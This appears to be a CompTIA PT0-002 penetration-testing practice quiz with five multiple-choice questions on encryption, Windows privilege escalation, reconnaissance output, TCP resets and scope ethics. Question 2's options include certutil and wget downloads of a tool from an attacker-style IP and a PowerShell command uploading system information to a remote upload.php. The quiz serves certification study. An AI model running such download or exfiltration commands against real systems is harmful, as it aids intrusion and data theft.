CompTIA PT0-002 Quiz 2 Topic 1 Questions 6-10

Question: 1

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

AS/MIME

BFTPS

CDNSSEC

DAS2

Show Answer

Question: 2

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

Acertutil --urlcache --split --f http://192.168.2.124/windows-binaries/ accesschk64.exe

Bpowershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')

Cschtasks /query /fo LIST /v | find /I ''Next Run Time:''

Dwget http://192.168.2.124/windows-binaries/accesschk64.exe --O accesschk64.exe

Show Answer

Question: 3

Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

AWebsite scraping

BWebsite cloning

CDomain enumeration

DURL enumeration

Show Answer

Question: 4

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

AThe web server is using a WAF.

BThe web server is behind a load balancer.

CThe web server is redirecting the requests.

DThe local antivirus on the web server Is rejecting the connection.

Show Answer

Question: 5

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary dat

a. The penetration testers have been given an internal network starting position.

Which of the following actions, if performed, would be ethical within the scope of the assessment?

AExploiting a configuration weakness in the SQL database

BIntercepting outbound TLS traffic

CGaining access to hosts by injecting malware into the enterprise-wide update server

DLeveraging a vulnerability on the internal CA to issue fraudulent client certificates

EEstablishing and maintaining persistence on the domain controller

Show Answer

CompTIA PT0-002 Quiz:2 Topic:1 Questions:6-10